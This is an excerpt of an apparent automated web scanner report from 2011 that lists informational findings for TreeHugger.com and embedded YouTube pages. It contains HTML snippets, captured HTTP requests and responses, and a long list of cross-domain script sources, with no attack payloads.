<td style="border-right: 1px dotted #d1d1d1;"><a href="http://www.reddit.com/submit?url=http://www.treehugger.com/files/2011/07/week-animal-news-terrifying-toothy-sea-worms-saving-sea-turtles-slideshow.php&title=The Week in Animal News: Terrifying Toothy Sea Worms, Saving Sea Turtles, and More (Slideshow)"><img src="http://www.treehugger.com/images/social-media/small/reddit.png" />
...[SNIP]...
<td style="border-right: 1px dotted #d1d1d1; padding-left: 0px;"> <a href="http://www.facebook.com/share.php?u=http://www.treehugger.com/files/2011/07/week-animal-news-terrifying-toothy-sea-worms-saving-sea-turtles-slideshow.php&t=The Week in Animal News: Terrifying Toothy Sea Worms, Saving Sea Turtles, and More (Slideshow)" style="text-decoration:none;"><img src="http://www.treehugger.com/images/social-media/small/facebook-share.png" border="0" />
...[SNIP]...
<td style="border-right: 1px dotted #d1d1d1; padding-left: 0px;"><a href="http://www.stumbleupon.com/submit?url=http://www.treehugger.com/files/2011/07/week-animal-news-terrifying-toothy-sea-worms-saving-sea-turtles-slideshow.php&title=The Week in Animal News: Terrifying Toothy Sea Worms, Saving Sea Turtles, and More (Slideshow)"><img src="http://www.treehugger.com/images/social-media/small/stumbleupon.png" />
...[SNIP]...
<em>Photo courtesy of <a href="http://www.fei.com/resources/image-gallery/hydro-worm-2908.aspx">Philippe Crassous at FEI</a>
...[SNIP]...
<div class="entry-footer">
<iframe src="http://www.facebook.com/plugins/comments.php?href=http://www.treehugger.com/files/2011/07/week-animal-news-terrifying-toothy-sea-worms-saving-sea-turtles-slideshow.php&permalink=1" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:130px; height:16px;" allowTransparency="true"></iframe>
...[SNIP]...
<td style="border-right: 1px dotted #d1d1d1;"><a href="http://digg.com/submit?url=http://www.treehugger.com/files/2011/07/driest-place-on-earth-covered-in-snow-photo.php&title=Driest Place On Earth Covered In 32 Of Snow (Photo)"><img src="http://www.treehugger.com/images/social-media/small/16x16-digg-guy.png" />
...[SNIP]...
<td style="border-right: 1px dotted #d1d1d1;"><a href="http://www.reddit.com/submit?url=http://www.treehugger.com/files/2011/07/driest-place-on-earth-covered-in-snow-photo.php&title=Driest Place On Earth Covered In 32 Of Snow (Photo)"><img src="http://www.treehugger.com/images/social-media/small/reddit.png" />
...[SNIP]...
<td style="border-right: 1px dotted #d1d1d1; padding-left: 0px;"> <a href="http://www.facebook.com/share.php?u=http://www.treehugger.com/files/2011/07/driest-place-on-earth-covered-in-snow-photo.php&t=Driest Place On Earth Covered In 32 Of Snow (Photo)" style="text-decoration:none;"><img src="http://www.treehugger.com/images/social-media/small/facebook-share.png" border="0" />
...[SNIP]...
<td style="border-right: 1px dotted #d1d1d1; padding-left: 0px;"><a href="http://www.stumbleupon.com/submit?url=http://www.treehugger.com/files/2011/07/driest-place-on-earth-covered-in-snow-photo.php&title=Driest Place On Earth Covered In 32 Of Snow (Photo)"><img src="http://www.treehugger.com/images/social-media/small/stumbleupon.png" />
...[SNIP]...
<p>File this one in the recent weather weirding category: NASA has released a satellite photo (h/t <a href="http://news.mongabay.com/2011/0720-hance_atacama.html">Mongabay</a>) showing the <a href="http://en.wikipedia.org/wiki/Atacama_Desert">Atacama desert</a>
...[SNIP]...
<div class="entry-footer">
<iframe src="http://www.facebook.com/plugins/comments.php?href=http://www.treehugger.com/files/2011/07/driest-place-on-earth-covered-in-snow-photo.php&permalink=1" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:130px; height:16px;" allowTransparency="true"></iframe>
...[SNIP]...
<td style="border-right: 1px dotted #d1d1d1;"><a href="http://digg.com/submit?url=http://www.treehugger.com/files/2011/07/ted-talk-jonathan-drori-on-tricks-flowers-play-on-pollinators.php&title=TED Talk: Jonathan Drori on Tricks Flowers Play on Pollinators"><img src="http://www.treehugger.com/images/social-media/small/16x16-digg-guy.png" />
...[SNIP]...
<td style="border-right: 1px dotted #d1d1d1;"><a href="http://www.reddit.com/submit?url=http://www.treehugger.com/files/2011/07/ted-talk-jonathan-drori-on-tricks-flowers-play-on-pollinators.php&title=TED Talk: Jonathan Drori on Tricks Flowers Play on Pollinators"><img src="http://www.treehugger.com/images/social-media/small/reddit.png" />
...[SNIP]...
<td style="border-right: 1px dotted #d1d1d1; padding-left: 0px;"> <a href="http://www.facebook.com/share.php?u=http://www.treehugger.com/files/2011/07/ted-talk-jonathan-drori-on-tricks-flowers-play-on-pollinators.php&t=TED Talk: Jonathan Drori on Tricks Flowers Play on Pollinators" style="text-decoration:none;"><img src="http://www.treehugger.com/images/social-media/small/facebook-share.png" border="0" />
...[SNIP]...
<td style="border-right: 1px dotted #d1d1d1; padding-left: 0px;"><a href="http://www.stumbleupon.com/submit?url=http://www.treehugger.com/files/2011/07/ted-talk-jonathan-drori-on-tricks-flowers-play-on-pollinators.php&title=TED Talk: Jonathan Drori on Tricks Flowers Play on Pollinators"><img src="http://www.treehugger.com/images/social-media/small/stumbleupon.png" />
...[SNIP]...
<em>Photo by<a href="http://www.flickr.com/photos/jaymiheimbuch/5623191996/sizes/m/in/photostream/"> Jaymi Heimbuch</a>
...[SNIP]...
<div class="entry-footer">
<iframe src="http://www.facebook.com/plugins/comments.php?href=http://www.treehugger.com/files/2011/07/ted-talk-jonathan-drori-on-tricks-flowers-play-on-pollinators.php&permalink=1" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:130px; height:16px;" allowTransparency="true"></iframe>
...[SNIP]...
<em>Photo by<a href="http://www.flickr.com/photos/oxfameastafrica/5758400938/sizes/m/in/photostream/"> Oxfam East Africa</a>
...[SNIP]...
<em>Photo credit: <a href="http://www.flickr.com/photos/samfrasersmith/3795685459/in/photostream/">Sam Fraser-Smith</a>/<a href="http://creativecommons.org/licenses/by/2.0/">Creative Commons</a>
...[SNIP]...
<em>The rugged basaltic rock terrain of the islands makes research slow and difficult. Photo credit: <a href="http://en.wikipedia.org/wiki/File:FatuIva_BasalticRocksAboveHanavave_20061111.jpg">Wikimedia Commons</a>
...[SNIP]...
<img alt="via internet science tech" src="http://www.treehugger.com/images/via_internet_travel_nature.jpg" width="468" height="305" class="mt-image-none" style="" />

<a href="http://www.guardian.co.uk/environment/2011/jul/20/aftermath-yellowstone-river-oil-spill">The Guardian</a>
...[SNIP]...
dents, and crafts a poignant warning about what damage oil pipeline spills can cause -- especially when residents aren't even told there is a spill, or were aware a pipeline existed at all.

Read the <a href="http://www.guardian.co.uk/environment/2011/jul/20/aftermath-yellowstone-river-oil-spill">full piece at The Guardian</a>
...[SNIP]...
</small>

This is Max, at about 12 hours old, windmilling his flippers in the air. He (or perhaps she) is one of 100 baby <a href="http://en.wikipedia.org/wiki/Green_sea_turtle">green sea turtles</a>
...[SNIP]...
</em> has only a few known predators -- sharks, leopards (in Africa), and man -- a baby sea turtle's early life is one of grave danger. The statistics are abominable: An average of <a href="http://nationalzoo.si.edu/scbi/aquaticecosystems/seaturtles/seaturtlesafricadeem.cfm">one or two hatchlings from 1,000 eggs will reach the 30-50 year reproduction age</a>.

<a href="http://www.visitbandung.net/a-day-trips/calling-out-all-surfer-dudes-roof-edge-awaits-in-ujung-genteng-indonesia.html">Pangumbahan Turtle Park</a>
...[SNIP]...
</a>

For more of <a href="http://twitter.com/#!/mbeautyman">Mairi Beautyman's travel stories, follow her on Twitter</a>
...[SNIP]...
<div class="related-indiv-body">

<iframe width="468" height="296" src="http://www.youtube.com/embed/terD85scv4w" frameborder="0" allowfullscreen></iframe>
<em>Video: <a href="http://www.youtube.com/watch?v=terD85scv4w">YouTube</a>
...[SNIP]...
th program that lets you check out the mountains of Tuscany where your grandfather grew up and scope out the backyard of that house you're considering buying can take you underwater, too: The recently <a href="http://earth.google.com/ocean/">updated <a href="http://google-latlong.blogspot.com/2011/06/see-seafloor-like-never-before-on-world.html">Google Earth</a>
...[SNIP]...
</a> that show off massive mountain ranges and volcanoes, while scientists at <a href="http://google-latlong.blogspot.com/2011/06/see-seafloor-like-never-before-on-world.html">Ridge 2000</a>
...[SNIP]...
<small>Photo: <a href="http://www.flickr.com/photos/sameffron/5764944436/sizes/l/in/photostream/">sameffron / cc</a>
...[SNIP]...
<img alt="via internet science tech" src="http://www.treehugger.com/images/via_internet_science_tech.jpg" width="468" height="305" class="mt-image-none" style="" />

<a href="http://www.npr.org/blogs/pictureshow/2011/07/15/137821595/why-the-colorado-river-stopped-flowing?ft=1&f=1025">NPR has a great piece on the Colorado River</a>
...[SNIP]...
<em>Photo courtesy of <a href="http://www.fei.com/resources/image-gallery/hydro-worm-2908.aspx">Philippe Crassous at FEI</a></em>

What you're looking at here isn't an advance rendering from J.J. Abrams' next monster movie -- though it looks like it'd be right at home next to the <a href="http://en.wikipedia.org/wiki/Clover_%28creature%29">thing from Cloverfield</a>
...[SNIP]...
<em>Photo: <a href="http://www.flickr.com/photos/tramod/5551690316/sizes/l/in/photostream/">tramod</a>
...[SNIP]...
<em>Photo: <a href="http://www.flickr.com/people/terykats/">Lefteris Katsouromallis</a> under a <a href="http://creativecommons.org/licenses/by/2.0/">Creative Commons license</a>
...[SNIP]...
</em>

Last year, Mat reported that wolf populations in the French Pyrenees <a href="http://planetgreen.discovery.com/travel-outdoors/wolves-return-french-pyrenees.html">were on the rise</a>, and that there were an estimated 180 of the animals in the country. It looks like that trend is continuing, <a href="http://www.lefigaro.fr/environnement/2011/07/10/01029-20110710ARTFIG00210-retour-progressif-et-controle-du-loup-en-europe-de-l-ouest.php">reports Le Figaro</a>
...[SNIP]...
<em>Photo: <a href="http://www.nigelsecostore.com/acatalog/spud-raincoat.html">nigels</a>
...[SNIP]...
<small>Photo: <a href="http://www.flickr.com/photos/furryscalyman/396164476/sizes/l/in/photostream/">Furryscaly / cc</a>
...[SNIP]...
<div class="related-indiv-body">

<iframe src="http://player.vimeo.com/video/18305022?title=0&byline=0&portrait=0" width="468" height="263" frameborder="0"></iframe>
...[SNIP]...
--Jesse Rosten

Jesse, who shot and edited the video, and Kallie Markle, who wrote the voiceover's text and read it, created this very nice short film, a sort of audio-visual poem to pay homage to the <a href="http://en.wikipedia.org/wiki/Redwood_National_and_State_Parks">Redwood Forests of Northern California</a>. It looks great and if you're stressed, it provides a nice 'zen moment'. Via <a href="http://vimeo.com/18305022">Vimeo</a>
...[SNIP]...
-willow-audubon-ecocruise-empire-state-building-photo.jpg" width="468" height="351" class="mt-image-none" style="" />
Naturalist Gabriel Willow leading a NYC Audubon Sunset Ecocruise photo courtesy of <a href="http://www.flickr.com/photos/marijafilipovic/5861426335/in/set-72157627025584682/">Marija Filipovic</a>
...[SNIP]...
<em>Photo: <a href="http://www.flickr.com/photos/mamoritai/3318308374/sizes/l/in/photostream/">Mamoritai</a>
...[SNIP]...
<em>Pigeons in Rouen, France. Photo: <a href="http://www.flickr.com/photos/zigazou76/3588289579/">Fr..d..ric Bisson</a> / <a href="http://creativecommons.org/licenses/by/2.0/deed.en">Creative Commons</a>
...[SNIP]...
</a> last weekend, our crew of urban-dwellers practically capsized the ship by racing to one side to catch a glimpse of <a href="http://planetgreen.discovery.com/travel-outdoors/plastic-bags-hurt-dolphins.html">dolphins</a>
...[SNIP]...
<em>Tulips have been one of the targets of smugglers. Photo: <a href="http://www.flickr.com/photos/jhattam/2630502200/in/photostream/">Jennifer Hattam</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<li><a href="http://treehuggerz.blogspot.com/" title="Updates about the TreeHuggerz website and general musings." rel="nofollow" target="_self">TreeHuggerz.Blogspot.com</a>
...[SNIP]...
<li><a href="http://unpluggedliving.com/" title="Helping You to Freeload Off of Mother Nature." rel="nofollow" target="_self">Unplugged Living</a>
...[SNIP]...
<li><a href="http://www.urbanecoinc.com/wordpress1/" title="A journal of sustainability for city dwellers." rel="nofollow" target="_self">urbanecoinc.com</a>
...[SNIP]...
<li><a href="http://watersana.typepad.com/watersana/" title="Water, health, imagination and living the green life." rel="nofollow" target="_self">WaterSANA</a></li>
<li><a href="http://www.worldchanging.com/" title="An online publication covering tools, models, and ideas for building a better future. Another world is here." rel="nofollow" target="_self">WorldChanging</a>
...[SNIP]...
<li><a href="http://www.worstedwitch.com/" title="Hex and the City: Knitting, lit crit, illustration, design, environmentalism, and fair trade." rel="nofollow" target="_self">The Worsted Witch</a>
...[SNIP]...
<li><a href="http://www.zpluspartners.com/zblog/" title="Pointers and commentary on emerging futures issues collected by Z + Partners" rel="nofollow" target="_self">Z + Partners - Weblog</a>
...[SNIP]...
<li><a href="http://www.agroblogger.com/" title="Agroecology...Agroforestry...Agrorevolution." rel="nofollow" target="_self">Agroblogger</a>
...[SNIP]...
<li><a href="http://grubbook.blogspot.com/" title="Blog of the book <i>Grub: Ideas for an Urban Organic Kitchen</i>" rel="nofollow" target="_self">Getcha Grub On</a>
...[SNIP]...
<li><a href="http://fogcity.blogs.com/jen/" title="A weblog focusing on the importance of locally and sustainably grown food." rel="nofollow" target="_self">Life Begins at 30</a>
...[SNIP]...
<li><a href="http://www.ecofriend.org/" title="Lead a ...Green Life... with this guide to the latest information and reviews on eco-friendly products, alternative energy, solar, wind, wave, bio-fuels, gadgets, biodegradable products, hybrid vehicles, and more..." rel="nofollow" target="_self">Ecofriend</a></li>
<li><a href="http://greatgreengoods.com/" title="A shopping site for the earth friendly consumer." rel="nofollow" target="_self">Great Green Goods</a>
...[SNIP]...
<li><a href="http://alt-e.blogspot.com/" title="news, views and strong opinions on alternative energy resources including wind power, solar energy, wave energy, geothermal & other alternate energy sources " rel="nofollow" target="_self">Alternative Energy Blog</a>
...[SNIP]...
<li><a href="http://technorati.com/faves?add=http://www.treehugger.com">Favorite TreeHugger at Technorati</a>
...[SNIP]...
<li>Subscribe to our feed:

<a href="http://feeds.feedburner.com/treehuggersite"><img src="http://feeds.feedburner.com/~fc/treehuggersite?bg=00CC00&fg=444444&anim=1" height="26" width="88" style="border:0" alt="" /></a>
...[SNIP]...
<li><a href="http://workerbees.typepad.com/hipandzen/" title="Celebrating the ethos and aesthetic of Hip & Zen, modern lifestyle products that nurture body and soul." rel="nofollow" target="_self">The Hip and Zen Pen</a>
...[SNIP]...
<li><a href="http://www.ivanenviroman.com/" title="Sustainability, Business, Technology, and Spirit" rel="nofollow" target="_self">Ivan Enviroman</a>
...[SNIP]...
<li><a href="http://www.mitra.biz/blog/" title="At the edges of Sustainability, Technology and Community." rel="nofollow" target="_self">Mitra - Natural Innovation</a>
...[SNIP]...
<li><a href="http://www.dominomag.com/resources/2007/02/greenlist" title="The guide to living with style." rel="nofollow" target="_self">Domino's Greenlist</a>
...[SNIP]...
<li><a href="http://www.nextbillion.net/" title="NextBillion.net brings together the community of business leaders, social entrepreneurs, NGOs, policy makers, and academics who want to explore the connection between development and enterprise." rel="nofollow" target="_self">NextBillion.net</a>
...[SNIP]...
<li><a href="http://www.evaneco.com/" title="The Evangelical Ecologist was started to meet the need for a conservative (sometimes libertarian) Christian voice in the environmental blogosphere today." rel="nofollow" target="_self">The Evangelical Ecologist</a>
...[SNIP]...
<li><a href="http://www.terrapass.com/terrablog/" title="TerraPass helps individuals easily and affordably balance the environmental impact of their driving, flying and home energy use by purchasing carbon offsets. Help fight climate change by reducing carbon dioxide air pollution. TerraPass is easy, effective, and affordable." rel="nofollow" target="_self">TerraBlog from TerraPass</a>
...[SNIP]...
<li><a href="http://www.triplepundit.com/" title="Serving people, planet and profit: An 'integrated bottom-line' approach to looking at business from the next generation of MBAs" rel="nofollow" target="_self">Triple Pundit</a>
...[SNIP]...
<li><a href="http://ecoiron.blogspot.com/" title="We provide reports and commentary on all aspects of green computing and sustainable technologies in IT." rel="nofollow" target="_self">ecoIron</a></li>
<li><a href="http://www.ecogeek.org/" title="EcoGeek - Bridging the Gap between Technology and Nature. Technology can be a force for evil, or for awesome. Those who shun the tech are just as guilty as those who ignore the environment. There's a safe balance, where the awesome can help nature as much as it helps us have a good time and live easier lives. EcoGeek devotes its pages to exploring the symbiosis between nature and technology. If you're interested in that, then stop by, and stop by often." rel="nofollow" target="_self">EcoGeek</a></li>
<li><a href="http://greenerside.typepad.com/my_weblog/" title="the perks and quirks of sustainable tech" rel="nofollow" target="_self">the greener side</a>
...[SNIP]...
<li><a href="http://greenrfidguy.com/" title="Sustainability through Radio Frequency" rel="nofollow" target="_self">Green RFID Guy</a>
...[SNIP]...
<li><a href="http://www.compost-bin.org/" title="Composters, Compost Bins and Compost Tumblers. Learn about Compost, Composting, Recycling and Reuse." rel="nofollow" target="_self">The Compost Bin</a>
...[SNIP]...
<div class="single-house-ad">
<a href="http://www.pair.com/"><img src="http://www.treehugger.com/images/ads/house-ads/pair/pair_button4_125x125.jpg" border="0" />
...[SNIP]...
<div class="nav-top-sub2">
© TreeHugger.com 2011 |
<a href="http://corporate.discovery.com/visitor-agreement/">Visitor Agreement</a> |
<a href="http://corporate.discovery.com/privacy-policy/">Privacy Policy</a> | <a href="http://corporate.discovery.com">Discovery Communications, LLC</a>
...[SNIP]...
</strong> <a href="http://dsc.discovery.com">Discovery Channel</a> | <a href="http://tlc.discovery.com">TLC</a> | <a href="http://animal.discovery.com">Animal Planet</a> | <a href="http://health.discovery.com">Discovery Health</a> | <a href="http://science.discovery.com">Science Channel</a> | <a href="http://store.discovery.com/?ecid=PRF-TV1-100552&pa=PRF-TV1-100552">Discovery Store</a>
...[SNIP]...
<br><a href="http://planetgreen.discovery.com/">Planet Green</a> | <a href="http://www.howstuffworks.com/">HowStuffWorks</a> | <a href="http://times.discovery.com">Discovery Times</a> | <a href="http://kids.discovery.com">Discovery Kids</a> | <a href="http://dhd.discovery.com">HD Theater</a> | <a href="http://fittv.discovery.com">FitTV</a> | <a href="http://www.petfinder.com">Petfinder</a> | <a href="http://turbo.discovery.com">Turbo</a>
...[SNIP]...
</div>

<script src="http://content.dl-rms.com/rms/mother/21163/nodetag.js"></script>
<script language="javascript" src="http://icompass.insightexpressai.com/549.js"></script>


<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08778"></script>
...[SNIP]...
<div>
<img src="//secure-us.imrworldwide.com/cgi-bin/m?ci=us-204250h&cg=0&cc=1&ts=noscript"
width="1" height="1" alt="" />
</div>
...[SNIP]...
<div class="facebook-widget">
<iframe scrolling="no" frameborder="0" src="http://www.facebook.com/connect/connect.php?id=17890180291&connections=6&stream=0" allowtransparency="true" style="border: none; width: 200px; height: 260px; padding: 0px; margin: 0px; min-height: 260px;"></iframe>
...[SNIP]...
<li><a href="http://twitter.com/treehugger"><img src="/scripts/slideouttab/redo/twitter.png" />
...[SNIP]...
<li><a href="http://twitter.com/th_rss"><img src="/scripts/slideouttab/redo/th_rss.png" />
...[SNIP]...
<li><a href="http://feeds.feedburner.com/treehuggersite"><img src="/scripts/slideouttab/redo/rss.png" />
...[SNIP]...
<div id="su-button-fixed">
<a href="http://www.stumbleupon.com/to/stumble/stumblethru:treehugger.com?utm_source=Treehugger&utm_medium=StumbleThru&utm_campaign=StumbleThruButton2"><img src="/images/social-media/su-button-fixed.png" />
...[SNIP]...
</div>

<script type="text/javascript" src="https://apis.google.com/js/plusone.js"></script>
...[SNIP]...

18.192. http://www.youtube.com/embed/6hCRafyV0zI previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.youtube.com
Path:	/embed/6hCRafyV0zI

Issue detail

The page was loaded from a URL containing a query string:

http://www.youtube.com/embed/6hCRafyV0zI?rel=0

The response contains the following links to other domains:

http://s.ytimg.com/yt/cssbin/www-embed-vflCY3xEz.css
http://s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif
http://s.ytimg.com/yt/jsbin/www-embed_core_module-vflAm9Ztm.js

Request

GET /embed/6hCRafyV0zI?rel=0 HTTP/1.1
Host: www.youtube.com
Proxy-Connection: keep-alive
Referer: http://www.treehugger.com/science_technology/?campaign=th_nav_scitech
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VISITOR_INFO1_LIVE=MszzkYLcUx8; __utma=27069237.1850136006.1311260263.1311260263.1311260263.1; __utmz=27069237.1311260263.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); GEO=561ec842ffaf1e8842f30871bd66643dcwsAAAAzVVOtwdbzTirJbA==; PREF=fv=10.3.181

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 13:43:27 GMT
Server: Apache
X-Content-Type-Options: nosniff
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Length: 13882
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html>
<head>
<title>YouTube - The Sceptics</title>

<link rel="stylesheet" href="http://s.ytimg.com/yt/cssbin/www-embed-vflCY3xEz.css">

</head>
<body>

<div id="watch-lo
...[SNIP]...
<div id="watch-longform-ad-placeholder"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" height="60" width="300"></div>
...[SNIP]...
</div>

<img class="html5-watermark html5-stop-propagation html5-icon hid" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="watermark">
<div class="html5-player-chrome html5-stop-propagation">
...[SNIP]...
</div>

<script src="//s.ytimg.com/yt/jsbin/www-embed_core_module-vflAm9Ztm.js"></script>
...[SNIP]...

18.193. http://www.youtube.com/embed/pDXWOjC-AlA previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.youtube.com
Path:	/embed/pDXWOjC-AlA

Issue detail

The page was loaded from a URL containing a query string:

http://www.youtube.com/embed/pDXWOjC-AlA?wmode=opaque

The response contains the following links to other domains:

http://s.ytimg.com/yt/cssbin/www-embed-vflCY3xEz.css
http://s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif
http://s.ytimg.com/yt/jsbin/www-embed_core_module-vflAm9Ztm.js

Request

GET /embed/pDXWOjC-AlA?wmode=opaque HTTP/1.1
Host: www.youtube.com
Proxy-Connection: keep-alive
Referer: http://www.seashepherd.org/news-and-media/2011/07/19/emergency-sos-from-captain-paul-watson-save-our-ship-1263
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VISITOR_INFO1_LIVE=MszzkYLcUx8; __utma=27069237.1850136006.1311260263.1311260263.1311260263.1; __utmz=27069237.1311260263.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PREF=fv=10.3.181; GEO=561ec842ffaf1e8842f30871bd66643dcwsAAAAzVVOtwdbzTirJbA==

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 13:15:26 GMT
Server: Apache
X-Content-Type-Options: nosniff
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Length: 14007
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html>
<head>
<title>YouTube - Emergency SOS from Captain Watson</title>

<link rel="stylesheet" href="http://s.ytimg.com/yt/cssbin/www-embed-vflCY3xEz.css">

</head>
<bod
...[SNIP]...
<div id="watch-longform-ad-placeholder"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" height="60" width="300"></div>
...[SNIP]...
</div>

<img class="html5-watermark html5-stop-propagation html5-icon hid" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="watermark">
<div class="html5-player-chrome html5-stop-propagation">
...[SNIP]...
</div>

<script src="//s.ytimg.com/yt/jsbin/www-embed_core_module-vflAm9Ztm.js"></script>
...[SNIP]...

19. Cross-domain script include previous next
There are 111 instances of this issue:

http://a.fsdn.com/adops/google/rev2/afc/sf_google_afc.js
http://a.netmng.com/hic/
http://a.netmng.com/hic/
http://ad.doubleclick.net/adi/N5767.dsc.discoveryOX2348/B5649101.33
http://ad.doubleclick.net/adi/N5823.Discovery/B5629823.10
http://ad.doubleclick.net/adi/N5823.Discovery/B5629823.11
http://ad.doubleclick.net/adi/N5823.Discovery/B5629823.12
http://ad.doubleclick.net/adi/N5823.Discovery/B5629823.16
http://ad.doubleclick.net/adi/N5823.Discovery/B5629823.17
http://ads.pubmatic.com/HostedThirdPartyPixels/TF/ae_12232010.html
http://aka-cdn-ns.adtechus.com/apps/247/Ad1695991St3Sz170Sq20242213V6Id1/extFile2.js
http://analytics.microsoft.com/Sync.html
http://analytics.msn.com/Include.html
http://assets.0.mybcdna.com/JavaScript/apps/HomeBeforeLogin/hblv2.js
http://assets.tumblr.com/iframe.html
http://betaworks.com/
http://c627028.r28.cf2.rackcdn.com/google28reddefaultsUSA728x90.html
http://c627028.r28.cf2.rackcdn.com/google29reddefaultsUSA728x90.html
http://c627028.r28.cf2.rackcdn.com/v36defaultsusa728x90btf.html
https://code.google.com/p/domsnitch/downloads/detail
https://code.google.com/p/domsnitch/downloads/list
http://code.msdn.microsoft.com/
http://consultants-locator.apple.com/index.php
http://corp.klout.com/blog/
http://corp.klout.com/careers
http://corp.klout.com/contact
http://corp.klout.com/kscore
http://corp.klout.com/perks
http://corp.klout.com/press
http://corp.klout.com/privacy
http://corp.klout.com/terms
http://games.myyearbook.com/
http://games.myyearbook.com/landing/pool
http://geek.net/
http://go.ionearth.com/
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://home.live.com/search
http://home.live.com/search/hip
http://ib.adnxs.com/if
http://keepitfresh.frid.ge/
http://msdn.microsoft.com/en-us/vstudio/ff431702.aspx
http://my.seashepherd.org/NetCommunity/Page.aspx
http://oascentral.discovery.com/RealMedia/ads/adstream_mjx.ads/www.treehugger.com/travel_nature//1683146035@x21,TopLeft,x29,x40,x41,x42,x43,x44,x45,x60,x61,x62,x63,x64,x65,x66,x67,x68,x69,x70
http://player.vimeo.com/video/18305022
http://player.vimeo.com/video/25752549
http://player.vimeo.com/video/26341323
http://player.vimeo.com/video/8022406
http://research.microsoft.com/en-us/
http://research.microsoft.com/en-us/downloads/cecba376-3d3f-4eaf-bf01-20983857c2b1/default.aspx
http://research.microsoft.com/en-us/events/fs2011/default.aspx
http://research.microsoft.com/en-us/events/fs2011/demofest.aspx
http://s1.lqcdn.com/m.min.js
http://silverpopweb01.beacontec.com/blogs/email-marketing/wp-content/plugins/google/css/plusone.css
http://social.msdn.microsoft.com/Search/en-US
http://social.msdn.microsoft.com/search/en-US/en-USebb6e
http://sourceforge.net/projects/hoytllc-vcloud/
http://tag.admeld.com/ad/iframe/610/bostonglobe/728x90/bg_1064637_61606220
http://visualstudiogallery.msdn.microsoft.com/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/
http://visualstudiogallery.msdn.microsoft.com/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/description
http://visualstudiogallery.msdn.microsoft.com/site/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/eula
http://visualstudiogallery.msdn.microsoft.com/site/search
http://widgets.klout.com/
http://wow.curse.com/downloads/wow-addons/details/rawr-official.aspx
http://www.asp.net/ajax
http://www.betabeat.com/2011/07/19/fever-pitch-new-yorkers-go-starry-eyed-for-start-ups/
http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/
http://www.dailymarkets.com/stock/2011/07/20/jack-henry-associates-to-offer-microsoft-productivity-software-via-subscription/
http://www.datacard.com/
http://www.facebook.com/connect/connect.php
http://www.facebook.com/connect/connect.php
http://www.facebook.com/plugins/comments.php
http://www.facebook.com/plugins/comments.php
http://www.facebook.com/plugins/fan.php
http://www.facebook.com/plugins/likebox.php
http://www.hitcon.org/hit2011/
http://www.hitcon.org/hit2011/download.html
http://www.jackhenry.com/
http://www.jackhenrybanking.com/
http://www.lifescript.com/Health/Conditions/ADD/Doctor-Recommended_Tips_for_Women_with_ADHD.aspx
http://www.lifescript.com/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx
http://www.lifescript.com/Health/Conditions/ADD/Out_of_Control_It_Could_Be_ADHD.aspx
http://www.lifescript.com/adcontrol.htm
http://www.m86security.com/products/web_security/m86-web-filtering-reporting-suite.asp
http://www.microsoft.com/en-au/netsolutionswa/casestudies.aspx
http://www.microsoft.com/en-us/default.aspx
http://www.microsoft.com/en-us/security_essentials/Search.aspx
http://www.microsoft.com/en-us/security_essentials/Support.aspx
http://www.microsoft.com/en-us/security_essentials/default.aspx
http://www.myyearbook.com/advertising/default.php
http://www.nmmlaw.com/index.php
http://www.observer.com/
http://www.paloaltonetworks.com/cam/switch/index.php
http://www.scmagazineus.com/
http://www.seashepherd.org/
http://www.seashepherd.org/media/js/jquery.prettyPhoto.js
http://www.seashepherd.org/news-and-media/2011/07/19/emergency-sos-from-captain-paul-watson-save-our-ship-1263
http://www.seashepherd.org/popups/mobile-signup-lightbox/
http://www.silverpop.com/
http://www.silverpop.com/demo/index.html
http://www.silverpop.com/marketing-resources/index.html
http://www.silverpop.com/tweets.html
http://www.treehugger.com/daylife/related/72065.html
http://www.treehugger.com/files/2011/07/sea-shepherd-ship-detained-shetland-islands-million-dollar-bond-needed.php
http://www.treehugger.com/galleries/
http://www.treehugger.com/science_technology/
http://www.treehugger.com/travel_nature/
http://www.uscgnews.com/go/doc/786/1135035/
http://www.youtube.com/embed/6hCRafyV0zI
http://www.youtube.com/embed/pDXWOjC-AlA
http://www.youtube.com/embed/terD85scv4w

Issue background

